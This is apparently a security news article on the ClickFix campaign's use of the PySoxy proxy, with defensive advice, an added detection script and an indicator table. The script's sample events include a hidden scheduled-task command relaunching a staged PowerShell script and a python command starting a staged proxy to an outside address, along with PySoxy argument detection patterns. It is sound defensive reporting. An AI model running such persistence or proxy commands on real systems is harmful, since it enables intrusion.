ClickFix uses a decade-old SOCKS5 proxy, raising security concerns
Key Takeaways
- The “ClickFix” attack campaign has evolved, now integrating a decade-old Python SOCKS5 proxy tool, PySoxy, to establish persistent and resilient access to compromised systems.
- Initial compromise still relies on social engineering to trick users into executing a PowerShell command, but the new methodology creates multiple, redundant access channels.
- Security researchers at ReliaQuest observed this enhanced technique in April 2026, noting its ability to survive even after initial outbound connections are blocked.
- The attack chain now establishes a persistent foothold through scheduled tasks and leverages PySoxy for a secondary, distinct communication pathway, making detection and remediation more challenging.
The “ClickFix” cyberattack campaign, known for leveraging social engineering to trick users into executing malicious commands, has adopted a significant new tactic. Recent analysis reveals attackers are now incorporating PySoxy, an open-source Python SOCKS5 proxy tool first released approximately ten years ago, into their operations. This integration creates a more robust and resilient intrusion method, allowing the compromise to persist even after initial security measures are enacted.
What was previously considered a straightforward user error has morphed into a sophisticated, multi-layered intrusion. This evolved ClickFix technique can maintain access to a system long after security tools attempt to block its initial communication channels, fundamentally changing the threat landscape for affected organizations, as detailed in a recent report.
The Evolving Attack Chain
The attack sequence begins conventionally: a user visits a malicious or compromised website that displays a fabricated prompt, coercing them into pasting and executing a PowerShell command on their local machine. This social engineering tactic is well-documented and has been a staple in numerous prior campaigns.
However, the critical divergence in this updated ClickFix campaign occurs immediately after the initial PowerShell command executes. Instead of a single, ephemeral callback, the malicious script establishes automated, enduring access, ensuring persistence beyond the initial user interaction.
Security researchers at ReliaQuest first identified this advanced campaign in April 2026. Their findings mark the inaugural instance where ClickFix execution has been observed in conjunction with PySoxy. The analysts characterized the outcome as a “durable access chain,” emphasizing its ability to re-execute repeatedly, even when outbound connections from the compromised host were intercepted and blocked by security controls. This persistence mechanism highlights a substantial shift in the threat’s behavior and its potential impact.
ClickFix Deploys PySoxy for Resilient Access
A crucial lesson from this campaign is that simply blocking an attacker’s network connection does not equate to ending the compromise. In the incident analyzed, endpoint security measures successfully severed both of the attacker’s initial access channels. Despite this, a pre-planted scheduled task on the compromised machine continued to attempt relaunching the malicious script for several hours.
This persistence mechanism effectively transformed a singular user mistake into an ongoing, active compromise. Experts suggest that ransomware affiliates may increasingly adopt ClickFix as a primary entry vector, alongside other established access methods. The operational parallels between this new ClickFix chain and “SocGholish” intrusions, which also utilize social engineering followed by reconnaissance and proxy-based access, indicate that ClickFix is maturing into a formidable pre-ransomware delivery platform.
Once the initial PowerShell command was executed, the attackers rapidly moved to solidify their foothold. They deployed a scheduled task designed to relaunch a staged script from the C:\ProgramData folder approximately every 40 minutes. This script functioned as a lightweight remote access tool (RAT), periodically polling the attacker’s command-and-control (C2) server every three seconds to receive and execute commands on the compromised host, then transmitting the results back.
Following the establishment of PowerShell-based access, the attackers proceeded with reconnaissance, utilizing built-in Windows tools to enumerate group memberships, identify domain controllers, and map other systems within the network. Only after confirming connectivity to a staging server did the attackers introduce PySoxy. They downloaded compiled Python bytecode and executed it with proxy arguments directing traffic to a distinct external IP address.
The deployment of PySoxy provided the attacker with a secondary, independent channel back into the host. This new pathway leveraged different infrastructure and exhibited distinct traffic patterns compared to the initial PowerShell C2. Consequently, even a complete shutdown of the PowerShell connection would leave this secondary access route open, demonstrating the attacker’s strategy of establishing redundant access within the environment.
What You Should Do
- Isolate Affected Hosts Immediately: Any system suspected of a ClickFix compromise should be fully isolated from the network to prevent lateral movement and further data exfiltration.
- Review Scheduled Tasks: Conduct a thorough audit of all scheduled tasks, paying close attention to any created around the time of suspicious PowerShell activity. Prioritize investigation of tasks pointing to scripts in non-standard directories like `C:\ProgramData`.
- Monitor for Python Execution with Proxy Arguments: Implement monitoring for Python execution, especially when associated with command-line arguments such as `-ssl`, `-remote_ip`, and `-remote_port`, which are indicative of PySoxy usage.
- Scan for Malicious Files: Search for compiled `.pyc` files and staged scripts in unexpected locations. Ensure all components of the attack, including Python runtimes and bytecode files, are identified and removed, not just network connections.
- Enhance User Training: Reinforce security awareness training to educate users about social engineering tactics, the dangers of executing unknown commands, and how to identify suspicious prompts.
- Implement Endpoint Detection and Response (EDR): Utilize EDR solutions to detect and respond to suspicious process execution, scheduled task creation, and unusual network connections that may signal a ClickFix compromise.
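The following triage script is an added example illustrating three of the checks above (scheduled tasks that re-run a script from `C:\ProgramData` on a short interval, Python launched with PySoxy-style `-ssl`/`-remote_ip`/`-remote_port` arguments, and compiled `.pyc` files executed from staging folders). It is not code from the ReliaQuest report or from HackersRadar. The process-creation events it reads are constructed samples; the task names, file paths and the 203.0.113.10 address are invented placeholders, the `image`/`cmdline` field names are an assumption about how a Sysmon- or EDR-style export would look, and the "60 minutes or less" frequency threshold and the extra staging folders beyond `C:\ProgramData` are the example's own choices.

```python
"""Added example: triage constructed process-creation events for the
behaviours described above. Field names ("image", "cmdline") are an
assumption about a Sysmon/EDR export; every sample value is invented."""
import shlex
from dataclasses import dataclass

# Arguments the write-up names as indicative of PySoxy.
PYSOXY_ARGS = {"-ssl", "-remote_ip", "-remote_port"}
PYTHON_IMAGES = {"python.exe", "pythonw.exe", "python3.exe"}
# Lower-cased staging folders. C:\ProgramData is the one the report cites;
# the other two are common equivalents added here as an assumption.
STAGING_DIRS = ("c:\\programdata\\", "c:\\users\\public\\", "\\appdata\\local\\temp\\")

# Constructed sample events (not from the report); 203.0.113.10 is a placeholder.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks.exe /create /tn "Updater" /sc minute /mo 40 '
                r'/tr "powershell.exe -w hidden -File C:\ProgramData\upd.ps1" /f'},
    {"image": r"C:\ProgramData\py\python.exe",
     "cmdline": r"python.exe C:\ProgramData\py\svc.pyc -ssl "
                r"-remote_ip 203.0.113.10 -remote_port 443"},
    {"image": r"C:\Program Files\Python312\python.exe",
     "cmdline": r"python.exe C:\Users\alice\dev\report.py --output out.csv"},
    {"image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks.exe /create /tn "Backup" /sc daily /st 02:00 '
                r'/tr "C:\Program Files\Backup\run.exe"'},
]


@dataclass
class Finding:
    rule: str
    severity: str
    cmdline: str


def tokens(cmdline):
    """Windows-style split: whitespace-separated, quoted groups kept
    together, backslashes untouched; quotes stripped, case folded."""
    return [t.strip('"').lower() for t in shlex.split(cmdline, posix=False)]


def image_name(image):
    """Basename of the process image, lower-cased."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _opt(toks, name):
    """Value following a schtasks-style switch such as /tr or /mo, else None."""
    for i, t in enumerate(toks[:-1]):
        if t == name:
            return toks[i + 1]
    return None


def triage(event):
    """Return the Findings for one process-creation event."""
    findings = []
    img = image_name(event["image"])
    cmd = event["cmdline"]
    toks = tokens(cmd)

    # 1. python launched with PySoxy-style proxy arguments.
    if img in PYTHON_IMAGES and PYSOXY_ARGS & set(toks):
        findings.append(Finding("python-pysoxy-args", "high", cmd))

    # 2. Compiled bytecode on the command line; worse when it sits in a staging folder.
    pyc = [t for t in toks if t.endswith(".pyc")]
    if pyc:
        staged = any(d in p for p in pyc for d in STAGING_DIRS)
        findings.append(Finding("pyc-execution", "high" if staged else "medium", cmd))

    # 3. schtasks creating a task that re-runs a staged script on a short interval.
    if img == "schtasks.exe" and "/create" in toks:
        action = _opt(toks, "/tr") or ""
        staged = any(d in action for d in STAGING_DIRS)
        every = _opt(toks, "/mo")
        frequent = (_opt(toks, "/sc") == "minute"
                    and every is not None and every.isdigit() and int(every) <= 60)
        if staged and frequent:
            findings.append(Finding("schtasks-frequent-staged-script", "high", cmd))
        elif staged or frequent:
            findings.append(Finding("schtasks-review", "medium", cmd))
    return findings


def triage_all(events):
    """Flatten triage() over a batch of events."""
    return [f for e in events for f in triage(e)]


if __name__ == "__main__":
    for f in triage_all(SAMPLE_EVENTS):
        print(f"[{f.severity}] {f.rule}: {f.cmdline}")
```

Run against the four constructed events, the script flags the 40-minute `C:\ProgramData` task and the PySoxy launch (twice: once for the proxy arguments, once for the staged `.pyc`) and stays silent on the developer's `report.py` run and the daily backup task. In a real deployment the same logic would be fed from the EDR's process-creation stream, and a hit on rule 3 is the cue to pull the task's XML and the referenced script before, not after, cutting the network connection, since the report's point is that the task keeps relaunching the script once the C2 is blocked.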
Indicators of Compromise (IoCs):
| Type | Indicator | Description |
|---|---|---|
| IP Address | 185.205.211[.]217 | ClickFix infrastructure IP |
| IP Address | 206.206.103[.]120 | PowerShell RAT C2 |

Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.


